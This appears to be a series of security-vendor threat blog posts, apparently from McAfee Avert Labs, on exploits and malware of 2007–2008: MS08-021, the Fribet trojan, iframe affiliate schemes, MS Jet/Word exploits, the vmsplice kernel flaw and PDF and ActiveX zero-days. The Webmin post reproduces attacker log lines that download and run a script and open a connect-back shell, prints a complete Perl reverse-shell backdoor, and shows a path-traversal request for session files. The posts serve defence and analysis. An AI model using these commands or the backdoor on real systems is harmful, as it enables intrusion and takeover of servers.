Last week we discussed the fact that Microsoft credited three different researchers for reported CVE-2008-1087 during our monthly Patch Tuesday podcast. The fact that several independent researchers reported the issue suggested that others may not be far behind. This CVE pertains to the Microsoft Graphics Rendering Engine, which has a history of exploitation. In fact, McAfee’s Exploit-WMF detection for MS06-001 exploits was one of the top reported detections around the time that a patch was released. An exploit toolkit was released prior to the patch, which helped contribute to the number of exploits floating around. History may be repeating itself, though out of sequence.

Last Friday the first MS08-021 exploit was discovered in the field, three days after the issue was patched; and though it was not widespread, the discovery of the exploit did highlight the fact that attackers were actively working with exploit code. Today a basic exploit toolkit was posted publicly; and while this new toolkit is primitive, it may very well lead to “one-ups-manship” and the distribution of a more powerful tool.

Given the fact that a patch was released prior to this recent exploit activity it is unlikely that MS08-021 attacks will reach the level of MS06-001 attacks. However, there are still many many vulnerable systems out there, and we’ve seen prevalent exploits that have lasted for years after the issue was patched.

Just a month ago, we blogged about massive security incidents, relating to SQL injection attacks, that insert iframe links to remote sites that host exploit scripts and malware. Recently, we discovered the Fribet trojan, where the author was riding on both the success of such attacks and the controversy of the Tibet issue. The trojan was discovered on Pro-Tibet sites that were possibly hijacked to host Exploit-MS07-004, which appear to be specifically crafted.

When visitors of the pro-Tibet websites are infected, the Fribet trojan provides remote control and monitoring functions such as creating new files or folders, starting or terminating processes, and sending/receiving additional malware. Additionally, the Fribet trojan loads the “SQL Native Client” ODBC library, and is designed to receive arbitrary SQL statements from a command and control server. In turn, the ODBC library provides the functionality to Fribet to bind SQL connections and run arbitrary SQL commands from the victim machine(s). At the time of our research, the command and control server was not sending us commands. However, our reverse engineering of the malicious code shows it is more than capable of the following:

• Bind and connect to local or remote databases from the victim machine
• Query and steal data from local or remote databases
• Insert arbitrary data into local or remote databases, including web data such as hosting a web exploit

The attacker still needs to find out the information required to connect the database such as DSN, hostname, database name, User and Password, however, that information can be collected via other monitoring functions of Fribet, and it can also enumerate weak and default values.

This trojan apparently can be used as an alternate to SQL Injection attacks, but in a more direct way. Even the administrators of secure web sites, protected against common SQL injection attacks, should ensure database backends are equally secure to defend against such a penetration vector.

I made some interesting observations recently while looking through Webmin logs. It seems that someone was playing with Webmin worm/autorooter tools. Here is a piece of the webmin log:

root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;uname -a;id;uptime'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;unset HISTFILE HISTLOG HISTSAVE SCREEN'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;ls'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;wget aa.bb.cc/d.pl'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;cat /etc/issue'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;perl d.pl 2.2.2.2 2008'

Here we can see some suspicious activity. In particular, the Webmin root user connecting from 1.1.1.1 and trying to download and execute a perl script from aa.bb.cc on the system hosting Webmin. The script contained code to execute a shell + connect back to 2.2.2.2 on port 2008.

#!/usr/bin/perl
use Socket;
print "Data [removed] Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] \n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "" x 4;
exit(0);
}
print "[*] Datached\n\n";

By examining the Webmin log in further detail, it was possible to determine that the attacker used an older Webmin vulnerability (“Webmin Arbitrary File Disclosure Vulnerability (CVE-2006-3392)) to retrieve the webmin.log & sessiondb.pag files.

1.1.1.1 - - [02/Feb/2008:06:31:34 +0800] "GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/webmin.log HTTP/1.0" 200 390944
1.1.1.1 - - [02/Feb/2008:06:31:42 +0800] "GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/sessiondb.pag HTTP/1.0" 200 1024

The attacker then tried to access Webmin’s /shell/index.cgi page as follows:

1.1.1.1 - root [02/Feb/2008:06:31:46 +0800] "POST /shell/index.cgi HTTP/1.1" 200 4921

We know that access to /shell/index.cgi requires authentication using a valid Webmin user and corresponding password. However, we see that the attacker was able to access this resource without supplying a password (we see that the HTTP response code is 200). It turns out that this was possible because Webmin stores user session ID values in the webmin.log & sessiondb.pag files. If an attacker can retrieve these files then they can re-use the session ID of a user to access resources as that user without having to supply a password.

For example, here is an entry in webmin.log:

[04/02/2008 15:26:59] root f3fe4b90803a41096af8880e2e948a24 x.x.x.x proc run.cgi "run" "-" "-" cmd='ifconfig -a' input='' mode='0'

“f3fe4b90803a41096af8880e2e948a24″ is the session ID in this entry. These session IDs are valid for one week unless a user explicitly logs out of the Webmin interface by clicking the “logout” link. Since most users don’t do this, most session IDs continue to be valid long after they are needed. An attacker using a file disclosure vulnerability such as the one described above can attempt to retrieve + reuse these session IDs to impersonate users. The ability to impersonate users in this manner can lead to complete compromise of affected systems (because /shell/index.cgi can be used to execute arbitrary commands).

If you still run vulnerable webmin you should update it immediately or rename “/shell/index.cgi” script to avoid execute arbitrary commands by attacker. Since this attack vector came to automatic and already actively used in the wild.

A vulnerability has popped up (no pun intended…really) in Internet Explorer (IE) — or at least is claimed by a researcher named Juan Pablo Lopez Yacubian on the popular Bugtraq mailing list. It allows one to spoof the address of a popup without affecting the underlying page. This means that a bad guy could send the victim a legitimate link, have them follow it, and popup a spoofed window when they land on the attacker-controlled site (or hacked legitimate site). If this popup window is enticing enough, the attacker could persuade the victim to disclose information, click malicious links, or do other nefarious stuff.

There are a good amount of fairly obvious caveats for successful exploitation, however. First off, the victim must allow scripts to run, otherwise IE blocks it. Second, even if scripts are allowed, a good popup blocker should effectively be able to stop the window from popping up. Next, any click within the body of the popup will reveal the true identity of the address. Lastly, to be aesthetically pleasing, the address is limited to a certain character length.

All in all, this is nothing really spectacular…

That said, the main point here is to remind you to be sure to have basic browser protection (script blocking, trusted-domain model, popup blockers, etc.) in place and use common sense when you receive unsolicited links and unexpected popups.

Safe surfing…

Last week, I read some interesting news on an Australian website The Age. A journalist explained that a Russian malware distribution site offered a haul of 1000 spyware-infected Australian machines for 100USD, double the price offered for US machines and 30 times more than those from Asia.

Searching this site, I discovered the InstallsCash partnership program:

It was a well known dishonest offer: after registration, the affiliate had to put a short one line iframe code on his website pages. Next, and as explained in the FAQ, this hidden iframe would be used to silently redirect any visitor to another website to install (via an MPack like process) the affiliation program. Each successful installation made from the affiliate site would involve a payment.

To cover the tracks, the InstallsCash registrar is from China (bizcn.com). The fake registrant address is in the US (Iowa City) and the e-mail contact in Russia (ydwrtyxamz_at_mail.ru). It is easy to understand that this last name was randomly chosen. We will surely encounter some others in our investigations!

Being curious and to clearly demonstrate the dishonesty of the offer, I decided to subscribe myself by using some fake data to fill in the proposed form:

This screenshot is interesting; it lists the allowed system of payments. Here we recognize all the regular ones the cybercriminals are using. Having done that, I had to wait for 24 hours:

This Saturday at wake up, I tried my luck and attempted a connection. They activated my registration and my personal iframe code waited for me:

As I discussed first, the iframe I had to hide on my website pointed at another website using a strange name randomly chosen and created using a more or less automated method I discussed in a previous blog entry. It seems the affiliator creates or uses a different one for each affiliate. Thanks to these unique names, the software recognizes each of them. Data can be feed into their stats page and then they can calculate the payments.

On my personal page, the top white window contained my iframe. In the middle the affiliator gave me the same one, but in an encrypted form. It was not explained but it was clear I had to use this one on my pages to mislead or avoid some security technologies. The distributer goes so far as to say, and I quote, “they will be updating every 3 days and they will be invisible for every antivirus!”

The whois gave me the result I expected, which was something similar to InstallsCash.com:

Registrar was bizcn.com and registrant contact came with another improbable e-mail address:
Jan Dendinger ycsmmiqtyo_at_mail.ru
Phone +1 3196433xxx Fax: +13.196433xxx
309 East Main Street
West Branch IA 523581
us

Some quick searches with Google allowed me to find many other similar sites.

I looked at my stats page. Of course it was blank:

When the Age announced 100$ per 1000 unique loads, my rate table quoted the half and only 3$ for Asia:

But the journalist was right, in my private windows message as well as on the main page I could read InstallsCash made some special offer since February 16th: they increased their rates “for USA by 2 and any mix of country was about 30$”:

However, I note the price is still low compared with the payments these guys proposed in September 2006. But at that time, Australia and UK PC were the most wanted:

Yes, it seems that behind InstallCash, IframeCash (September 2006) and IframeDollars (November 2007) are hidden the same people. To understand this you can, for example compare the FAQs:

In November 2007, the RBNExploit blog discussed then that iFrameCash and iFrameDollars were possibly linked to the Russian Business Network. This confirms that RBN trading partners are still in business. And if they propose, since thay have been doing it for several years, commissions for deliberately planting malicious iframes, believe me, it is because it is a lucrative business.

Finally please note that via its ScriptScan module, McAfee VirusScan blocks and detects the PHP script as JS/Exploit-BO.gen. Moreover, the invisible files are detected as Downloader-BDH.

Recently, we blogged about MS Access exploits are being targeted trough Microsoft Word. In this blog we dig deeper, to see the structure of the files used in this attack, and analyze how the payload is delivered.

In the following example, the threat arrived as 2 files with “.doc” extensions (xxx1.doc and xxx2.doc); however one of the files is actually a Microsoft Access database containing the MS Jet exploit.  The whole story is depicted in Figure 1.

Figure 1: The flow of the trojan installation process

When users open the MS Word file xxx1.doc, the MS Access file xxx2.doc is loaded through the data link properties. Then the shellcode in the xxx2.doc file runs (triggered by the MS Jet exploit in the same file) and decodes itself in typical fashion.  The shell code launches WinWord.exe to open the innocent Word file embedded in “xxx1.doc”.

While the shellcode opens the Word file, it also decodes the executable file embedded in xxx1.doc. The decoding includes the simple XOR with a mask of 0xFF, and to deobfuscate the first 8 bytes of MZ header which is masked with XOR mask 0xAF.

You may see the data link aspect of xxx1.doc by placing the xxx2.doc file in a different folder than xxx1.doc. When users open xxx1.doc, the “Data Link Properties” window appears.  The specified database name is a the path containing xxx2.doc and the password is empty.  Because of this data link, xxx2.doc is typically loaded silently.

The trojan installation techniques used in this threat are nothing special and can be seen in other exploit files; however the method to trick users in this attack, by using non-exploit OLE files as loaders of other exploit OLE files is something new. As we see from past attacks, we no longer can rely on file extensions. We should continuously be careful with all unknown OLE files and not open untrusted email attachments.

A few weeks ago we blogged about a recent MS Access exploits being nothing new.  Well there is now something new.

On the heels of Symantec blogging about a new tandem Word document/Access database exploit; Microsoft released Security Advisory (950627).  As we stated before, Microsoft considers MDB files to be unsafe.  Accordingly, Microsoft email clients prevent users from attempting to double-click on MDB (Microsoft Access Database) files.  Up until recently attackers typically exploited MS Jet DB vulnerabilities through MDB files, and therefore Microsoft stuck to their “MDB files are unsafe” story.  Well that’s changed.

In several recent-yet limited-attacks, exploits were crafted to attack an MS Jet Database vulnerability through Word.  The Word docs are coded to reference Access database files regardless of extension (which allows attackers to circumvent content filters looking for specific email attachment extensions).

An attack scenario looks like this:

1. A user receives an email message with 2 attachments (one of which is a Word document)
2. The email client saves the attachments to the same directory
3. The user opens the Word document, which in turn opens the Access database containing the exploit code

In another scenario the attackers have archived both the database and Word document in a ZIP file, but the principle is the same.

Microsoft states that Msjet40.dll versions greater than 4.0.9505.0 are not vulnerable, which means this issue was (silently) fixed for Windows Server 2003 SP2 and Windows Vista.

McAfee DAT files version 5256 (released March 20) detect all known Access exploits as Exploit-MSJet.

Here’s a quick post about a claimed zero-day vulnerability in CA BrightStor ARCserve Backup, software that provides backup functionality for Windows systems. Proof-of-concept exploit code for this vulnerability is public.

A specially crafted Web page could trigger a stack overflow in the AddColumn() method in the ListCtrl Active X Control. For an attack to occur, a user would have to be tricked into visiting a malicious Web site. The exploit writer states that he has successfully run his attack code against CA BrightStor ARCserve Backup r11.5, with Internet Explorer 6 running on Microsoft Windows XP SP2 (the Polish edition).

McAfee Avert Labs is analyzing the flaw. As an aside, our research database reveals that the last known vulnerability in CA BrightStor ARCserve Backup was disclosed on November 26, 2007: CVE-2007-5328. CA worked with the discloser to release a patch for the vulnerability on the same day.

On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injection of script into valid web page to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:

• MS06-014
• RealPlayer (ActiveX Control)
• Baofeng Storm (ActiveX Control)
• Xunlei Thunder DapPlayer (ActiveX Control)
• Ourgame GLWorld GlobalLink Chat (ActiveX Control)

This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers.

Preliminary research results suggest more than 10,000 pages were affected by this hack attack.

Similar attacks were observed in the past; most notable the infamous “Dolphin Stadium” (aka Super Bowl) attack was similar, which was later connected with SQL injection as the method used by the attackers to inject their malicious code. In cases where the TITLE tag has been modified, the browser’s title bar will show the script reference:

Example of browser title bar (censored)

McAfee’s designations for the various pieces of malware include:

• Downloader-BGX
• Exploit-RealPlay
• JS/Exploit-BO.gen
• VBS/Psyme

Analysis is ongoing.

Recently our friends from Pandalabs published a weblog, stating there is a new Microsoft access exploit found in the wild. We initiated some research on this exploit and found it actually targets an older well known vulnerability, CVE-2005-0944, found by the hexview team in March 2005. It’s very easy to exploit this vulnerability. We had observed similar exploits last year, and the dropper used in this case looks very similar to that one.

Microsoft considers MDB files to be unsafe, so a specific patch for this vulnerability has not been released since it was made public 3 years ago.

The interesting thing about this vulnerability is that it happens in msjet40.dll, which was never updated on a Windows XP SP2 since the release of MS04-014 (for other platforms, please check out http://support.microsoft.com/kb/239114).

In this specific case, the dropper uses a jump address in mswstr10.dll, which is part of MS JET 4.0 engine package. So for XP SP2 users the trojan gets executed in almost all cases no matter whichever version of Office XP and 2003 you are using. We tested Office 2007, 2003 and XP and found that only Office 2007 was immune to this vulnerability.

McAfee AV detects this recent exploit via DAT 5236 which was released February 22 and our IntruShield NIPS sensors can detect and block this by our generic protection signatures for MS Access “HTTP: Microsoft Jet DB Engine Buffer Overflow” released on November 13, 2007.

Since Microsoft doesn’t patch Access-related vulnerabilities, we highly recommend Office users never open untrusted MDB files.

Today at Avert Labs, we released the third edition of Sage – our security journal. As always, we strive to be a bit different with our content in Sage. A little provocative, new trends, new ideas… And this issue is no different.

In this issue we look at the growing trend of localization in malware and threats. Cybercriminals are increasingly crafting attacks in multiple languages and are exploiting popular local applications to maximize their profits. Cybercrooks have become extremely deft at learning the nuances of the local regions and creating malware specific to each country. They’re not just skilled at computer programming—they’re skilled at psychology and linguistics, too.

We examined global malware trends in this report, titled “One Internet, Many Worlds.” The report is based on data compiled by our international security experts and examines the globalization of threats and the unique threats in different countries and regions. In the report, we detail the following trends and conclusions:

• Sophisticated malware authors have increased country-, language-, company-, and software-specific attacks
• Cyberattackers are increasingly attuned to cultural differences and tailor social engineering attacks accordingly
• Cybercrime rings recruit malware writers in countries with high unemployment and high levels of education such as Russia and China
• Cybercriminals take advantage of countries where law enforcement is lax
• Around the world, malware authors are exploiting the viral nature of Web 2.0 and peer-to-peer networks
• More exploits than ever before are targeted at locally popular software and applications

Download Sage 3

Zero-day emerges

On February 9, zero-day exploit code [1] was posted on milw0rm site. It exploited
vulnerability in Linux kernels Versions 2.6.17 to 2.6.24.1. This bug allows
an unprivileged local user to gain root privileges. This vulnerability was
assigned CVE-2008-0600.
There are reports that this exploit is reliable and actively used in the wild.
The inner workings of this exploit are quite interesting from the
technical point of view; let’s have a look.

Details on the vulnerability and methods of exploitation

The vulnerability lies in the get_iovec_page_array function
(in fs/splice.c, line numbers from 2.6.23.1-42.fc8 kernel),
reachable from the vmsplice() system function:

1286:       if (unlikely(!len)) // "len" variable is under user's
            control
1287:               break;
...
1296:       off = (unsigned long) base & ~PAGE_MASK;
...
1306:       npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
1307:       if (npages > PIPE_BUFFERS - buffers)
1308:               npages = PIPE_BUFFERS - buffers;
1309:
1310:       error = get_user_pages(current, current->mm,
1311:                              (unsigned long) base, npages, 0, 0,
1312:                              &pages[buffers], NULL);

The get_user_pages function expects its fourth argument (the
number of pages descriptors to fill; it limits the return value) to be at
least 1. In the preceding code it is assumed that the npages variable is at least 1 (because len must be nonzero, so the off + len + PAGE_SIZE - 1 expression should be greater or equal than PAGE_SIZE). However, if the len variable is close to UINT32_MAX, then the off + len + PAGE_SIZE -1 computation will result in an integer wrap, and npages can be zero.

As a result, get_user_pages may return more than
PIPE_BUFFERS entries, and the pages array will
overflow. However, the overflow payload is not controlled by the attacker,
so it would be difficult to turn this overflow into reliable code execution.

The reliable exploitation happens thanks to the subsequent loop:

1320:       for (i = 0; i > error; i++) {
1321:               const int plen = min_t(size_t, len,
                    PAGE_SIZE - off);
1322:
1323:               partial[buffers].offset = off;
1324:               partial[buffers].len = plen;
1325:
1326:               off = 0;
1327:               len -= plen;
1328:               buffers++;
1329:       }

Here, the partial array, which is also PIPE_BUFFERS
elements long, is overflowed with (off=0, plen=0×1000) pairs. Now, depending on the variables
layout chosen by the compiler, various data structures (that follow partial array) can be overwritten with zero. In the most common case, the pages array will be located after the partial array. The pages array contains pointers,
thus after the preceding loop, it will contain NULL pointers.

Normally, when the kernel tries to access a NULL pointer, it will result in an
exception and the process will be terminated. However, the attacker can map
memory pages at address zero, and store arbitrary data there. In such a scenario,
when the kernel dereferences pointers from the pages array,
attacker-controlled data will be processed, which may result in arbitrary
code execution in the kernel context. In our case, the convenient technique is
to make an entry in the pages array look as a compound page
descriptor, which will result in a function call to an attacker-controlled
address in user space:

37 static void put_compound_page(struct page *page)
   /* attacker controls arg */
38 {
39     page = (struct page *)page_private(page);
40     if (put_page_testzero(page)) {
41             void (*dtor)(struct page *page);
42
43             dtor = (void (*)(struct page *))page[1].lru.next;
44             (*dtor)(page); /* so attacker controls the target
                of the call
45     }
46 }

To sum up, the exploitation involves:

• integer overflow
• buffer overflow
• mapping the zero address to allow NULL dereference

Workarounds

The kernel upgrade is the preferred solution; but if it is not feasible, there
are workarounds.

A simple kernel module, which disables the sys_vmsplice system
call, has been posted [2].

The exploit we’ve discussed relies heavily on the possibility to map memory at
address zero. Starting with kernel 2.6.23, there is a mechanism to forbid such
mapping via procfs. The echo 65536 > /proc/sys/vm/mmap_min_addr
command will set the lowest possible mapping to be at 64K. Note that:

• SELinux must be enabled (in enforcing mode) for this command to take effect.
• Although this setting certainly makes the current exploit fail, there is a nonzero probability that the vulnerability can be exploited without mapping the zero address. I know of no code capable of such exploitation; however, it cannot be ruled out.
• This setting may prevent exploitation of future NULL pointer dereferences vulnerabilities. Very few programs make legitimate use of mapping the zero address.

References

[1]
Linux vmsplice Local Root Exploit By qaaz
[2]
Runtime disable of sys_vmsplice

McAfee Avert Labs is tracking an active exploitation of a recently patched vulnerability in Adobe Acrobat Reader now in the wild. The current vulnerability can be embedded in a PDF file and manipulated through Adobe JavaScript.

The first evidence of such maliciously crafted PDF files was posted to an Italian message forum from an alert administrator who noted that three of his workstations had been infected. Successful exploitation leads to the embedded JavaScript being executed on the victim’s machine. The script attempts to download a Trojan from an IP address in the Netherlands.

This exploit works for both browser-based and email attack vectors and affects the following Adobe products:

• Adobe Reader 8.1.1 and earlier versions
• Adobe Acrobat Professional, 3D, and Standard 8.1.1 and earlier versions

Complete mitigation requires upgrading Acrobat and Adobe Reader 7.x and 8.x to Version 8.1.2.

Malware authors will find this technique of using exploit-laden PDF files in spear phishing attacks very profitable–especially since the Portable Document Format (PDF) is a de-facto standard for exchanging electronic documents online. PDF files have traditionally been unfiltered at the gateway and until recently were considered risk free–in contrast to the notorious history associated with Microsoft Office documents.

With the release of Windows Vista and Microsoft Office 2007, however, Microsoft has made it more difficult for attackers to use buffer overflow exploits. Thus we expect to see exploit writers target the lower hanging fruit. Exploiting vulnerabilities in popular applications from Adobe, Apple, or RealPlayer are proving to be just as advantageous and profitable for the bad guys.

We strongly advise users running vulnerable versions of Adobe Reader and Acrobat to update them from the Adobe site. McAfee users are protected against these maliciously crafted PDF files with today’s 5227 DAT release, which detects them as Exploit-PDF.b.

Zero-day vulnerabilities in Yahoo products are not something novel and should be taken very seriously. Last year, we also saw a couple of ActiveX based vulnerabilities in Yahoo Messenger that are still exploited and incorporated into various web-based attack kits. One of the most prolific still is the Yahoo Webcam ActiveX Controls buffer overflow vulnerability .

Yahoo Music Jukebox is free music-management software that lets you play music files, burn CDs, and tune into your favorite Web radio stations. Within a day of the new Yahoo Jukebox zero-day being publicly disclosed on February 2, a fully working exploit was developed and widely circulated in various forums.

The first vulnerability is a stack-based buffer overflow in the overly long “url” parameter passed to the AddButton and AddImage functions in the YMP DataGrid ActiveX control (datagrid.dll).

The second vulnerability is a buffer overflow with a long “bitmapUrl” parameter passed to the AddBitmap function in the YMGMediaGridAx ActiveX control (mediagridax.dll).

This issue has been observed with Mediagridax.dll version 2.2.2.056 and datagrid.dll version 2.2.2.056, which are distributed as part of latest version of Yahoo Music Jukebox 2.2.2.056 and few older Yahoo Messenger versions.

A further temporary workaround for the problem would be to set the killbit for the offending ActiveX controls:

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5F810AFC-BB5F-4416-BE63-E01DD117BD6C}
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{22FD7C0A-850C-4A53-9821-0B0915C96139}

It could be only a matter of time until we see customized versions of these exploits make their way into the wild to be employed by malware authors to infect machines. McAfee customers have been protected from this threat since the 5223 DATS–as JS/Exploit-YahooGrid.

This week, McAfee® Avert® Labs detected a bunch of uninteresting old OLE exploits. The fact that they are old and are still actively being used by malware authors, however, evidently shows that they continue to be a potent threat to many computer users who do not routinely patch their systems.

At least seven maliciously crafted Word documents, touting recent political news, are believed to have taken their content directly off the Internet:

• African countries need to further consolidate macroeconomic stability.doc
• Free Tibet Olympics Protest on Mount Everest.doc
• Hong Kong Parade Supports 19 Million CCP Withdrawals.doc
• DIRECTORY OF TIBET SUPPORT GROUPS IN INDIA.doc
• 2007-07 DRAFT Tibetan MP London schedule.doc
• CHINA’S OLYMPIC TORCH OUT OF TIBET 1.doc
• Disapppeared in Tibet.doc

Each of these documents are designed to install further backdoor or downloader Trojans on systems running unpatched versions of Microsoft Word. Two known Word vulnerabilities are exploited, and should be patched as below:

For McAfee customers, proactive detection is available. For more information about coverage for your setup, go here:

• Exploit-MSWord.b
• Exploit-MS06-027

Once again, we offer the gentle reminder to install the latest security patches from the vendor.

Last night Microsoft released Security Advisory (947563) due to the discovery of a targeted zero-day attack. Microsoft states the following products are vulnerable:

• Microsoft Office Excel 2003 Service Pack 2
• Microsoft Office Excel Viewer 2003
• Microsoft Office Excel 2002
• Microsoft Office Excel 2000
• Microsoft Excel 2004 for Mac

I took a look at previous Office zero-day vulnerabilities that were discovered through active exploitation since the beginning of 2005. As you can see below, there was a seven-month gap in the public disclosure of these vulnerabilities.

Although this bit of trivia is somewhat interesting, it’s difficult to draw meaning from it. It’s possible that the lull exists only in reporting, rather than in the active exploitation itself. Here’s a per-product breakdown of the source of the vulnerabilities:

The last Excel zero-day discovered through exploitation was reported more than 18 months ago.

It’s not a secret anymore; criminal organizations behind a large part of Internet-related frauds are huge and well organized. In the last quarter of 2007, two studies about RBN (Russian Business Network), one of the most well known criminal organizations so far, were published. Last year, I looked at them with great interest. The first is named Uncovering Online Fraud Rings: The Russian Business Network and is available as a webcast recording on the Verisign web site. The second was written by David Bizeul and is named Russian Business Network study.

These papers demonstrate and illustrate that RBN is an empire. It directly or indirectly manages potentially a million sites. Thanks to elaborate intrusive advertising techniques, millions of Internet users visit its fake retail sites every month. Hackers and other cybercriminals also have their stores and outlets there: malware sales, service offers and booby-trapped sites. Pornography and pedophilia always make money there.

In addition to these documents, some particularly thorough stories have been circulating on the Net (papers from Brian Krebs, Washington post and posts on the RBNexploit and Dancho Danchev blogs).

Mailing addresses, name and photos of suspects, detailed lists of machines and autonomous systems as well as many other details were revealed. Because of this, the group has deemed it best to partially disappear. On November 6th, 2007, many network nodes stopped responding. It was not the end of them though; the business has been carefully planned: high-activity sites – those leading the attacks at the time – were not disturbed. Gradually, the affected sites began to re-appear in Russia as well as all over the world. Today, many countries in Southeast Asia are mentioned, but they are not alone. The reorganization is on the move: new retail payment systems for fake products (mainly fake security products and fake video codecs), new legitimate sites hosting tricky banner ads redirecting computers to these fake retail web sites, new Storm (aka Nuwar) worm campaigns achieved by new C&C botnet implementations, new web sites hosting malicious software (like MPack or WebAttacker) and secretly reached after the victims encounter a hidden iFrame during Internet surfing.

People tracking down RBN regularly watch its Autonomous Systems (AS). These are collections of connected IP networks controlled by a single entity and defined by an AS number. The RBNexploit blog and the David Bizeul document are very comprehensive on this subject and various network maps or tables help the reader to understand the complexity of such an organization.

One puzzle piece is known as AS40989. Despite the fact it was not the core center of the RBN activity it is well-known because it seems to be the official name of the group. It is the subject of a new write-up available at the Shadowserver Foundation web site.

This document analyzes the malicious binary activity directed to and commanded by AS40989. From March to November 2007 the researchers collected 2859 pieces of malware which initiated HTTP connections to it. They found an impressive collection of malware: “Gozi, Goldun, Hupigon, Nurech, Nuklus, Pinch, Sinowal, Tibs, Xorpix, various dialers, downloaders, worms, adware, page hijackers, and proxies”. Once again, it demonstrates the professionalism and the size of the group.

Reading material on RBN is abundant. With this post, I only wish to draw your attention to this existing material. It demonstrates the vitality of the new criminal organizations, it also demonstrate that many people, at McAfee and elsewhere, stay tuned into the dark side of the Internet to understand how the situation is constantly changing and to fight against this threat at a worldwide level.

A few weeks back we blogged about malware-laced codecs embedded in various Blogspot domains. Today within hours after the assassination of former Pakistani Prime Minister Benazir Bhutto, malware authors have started capitalizing on this news to spread a new fake codec. This time it is purported to be an assassination video of the former PM.

Claiming to be a New HD Codec, these malware authors attempt to social engineer users into believing they are downloading a legitimate codec for playing the video. At least 10 Blogger websites are observed to be hosting this fake video (at the time of writing this blog) which redirects the users to the typo-squatted domain containing fake codec:

http://video.googl.[removed]

Malicious code hosted on the 3322 domain is not something novel. One of the recent high profile attacks which pointed to a malicious script from the 3322 domain was the Indiatimes Mail hack.

There are a plethora of websites which attempt drive-by installations when unsuspecting users visit websites returning search engine results for “Benazir Bhutto”. Many of these compromised webpages have malicious scripts injected into the webpage which points to the 3322 domain. These webpages contain obfuscated variants of the MS06-014 exploit which is perhaps one of the most popular of all the exploits we see on a daily basis.

This fake Trojan Codec is detected by the current DATS as Puper. The downloaded exploit is detected as VBS/Psyme and the executable is detected as Generic Downloader.c

(Credits to Pradeep Govindaraju for the great malware analysis)

Occasionally we find PC malware that can have an effect on mobile phones or vice versa. The W32/Mobler worm installs SymbOS/MultiDropper.CC to any Windows system it infects. The Symbian malware has no effect on the PC. Similarly SymbOS/Multidropper.CC installs W32/Mobler to the memory card. The mobile version is arguably more effective as inserting a memory card with Mobler into a PC with AutoRun configured is enough to cause an infection.

The malware author was trying to save some effort in the creation of new malware by reusing older malware. This is not the usual case with malware as creators, driven by the need to avoid detection, produce their own code or use newer malware toolkits.

Multi platform exploits
The situation with vulnerability exploits is more complex. While exploits are usually tied very closely to hardware and operating systems, they are also occasionally distributed as source code allowing study and modification. An example of this is the libTIFF exploit used by hackers to install homebrew games on the Sony Playstation Portable(PSP). The PSP libTIFF exploit was subsequently ported to the iPhone and allowed the installation of third party applications. Security researchers later added the libTIFF exploit to a penetration testing framework.

Portable malware knowledge
Penetration testing frameworks help to tie exploits to payloads(e.g. gaining control of a vulnerable system). The frameworks allow the reuse of previous vulnerability research. This helps reduce the work needed by a penetration tester or attacker to fully utilize an exploit. They can write multiple payloads for a single vulnerability exploit.

In a series of blog postings, a security researcher detailed the process he used to port the libTIFF exploit and develop multiple payloads for the iPhone. It helped a bit that the iPhone and Macs are both running versions of OS X. Although they work on different types of CPUs(x86 for Mac; ARM for iPhone), he was able to leverage his Mac payload knowledge to produce iPhone payloads in a few week’s time.

Mobile exploits
This week we saw the release of a number of exploits for a buffer overflow vulnerability in various PC multimedia players. The vulnerability was limited to a specific MP4 video file codec. The exploits, we detect them as Exploit-MP4, were implemented as specially crafted MP4 video files.

There was a possibility that the malformed video files could cause issues on mobile phones. During testing we found that one of the exploits caused certain phones to hang when played. When we investigated further, we discovered that a similar buffer overflow to the PC existed on the phones. While the exploit will only cause a denial of service currently, it is possible that an attacker could develop a more malicious payload for the affected phones. The example of the penetration testing framework shows that it is relatively straightforward for dedicated attackers to use previously gained knowledge to produce mobile exploits in short periods of time.

The term “rootkit” was originally used to refer to toolkits used by root privileged users. This definition has evolved over time. Nowadays, the term rootkit refers to backdoor programs that run with elevated privileges and that are designed to evade detection by users, administrators and rootkit detection software. Rootkits first appeared in China in 2001 and have evolved substantially since then.

